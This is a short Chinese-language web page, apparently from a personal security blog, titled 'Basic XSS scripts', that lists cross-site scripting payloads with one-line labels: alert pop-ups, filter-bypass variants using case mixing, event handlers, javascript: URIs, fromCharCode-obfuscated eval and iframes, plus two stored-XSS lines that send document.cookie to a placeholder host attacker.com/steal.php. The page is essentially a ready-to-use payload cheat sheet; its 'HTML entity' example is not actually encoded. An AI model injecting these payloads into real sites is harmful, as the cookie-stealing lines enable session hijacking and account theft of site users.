首页 web

# 基础 XSS 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
基本弹窗
<script>alert('XSS')</script>

简写弹窗
<script>alert(1)</script>

不使用script标签
<img src=x onerror=alert('XSS')>

SVG矢量图形XSS
<svg onload=alert('XSS')>

$绕过过滤的XSS脚本$

大小写混淆
<ScRiPt>alert('XSS')</sCrIpT>

使用HTML实体编码
<script>alert('XSS')</script>

使用JavaScript伪协议
<a href="javascript:alert('XSS')">点击我</a>

事件处理程序
<body onload=alert('XSS')>

$存储型XSS示例$

评论框注入
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

图片标签注入
<img src="http://attacker.com/steal.php?cookie="+document.cookie>

$高级技巧$

使用eval函数
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>

DOMXSS
"><script>alert('XSS')</script>

使用iframe
<iframe src="javascript:alert('XSS')"></iframe>

使用CSS表达式(仅限旧版IE)
<div style="xss:expression(alert('XSS'))"></div>
更新于

请我喝[茶]~( ̄▽ ̄)~*

麻糖 微信支付

微信支付

麻糖 支付宝

支付宝

麻糖 贝贝

贝贝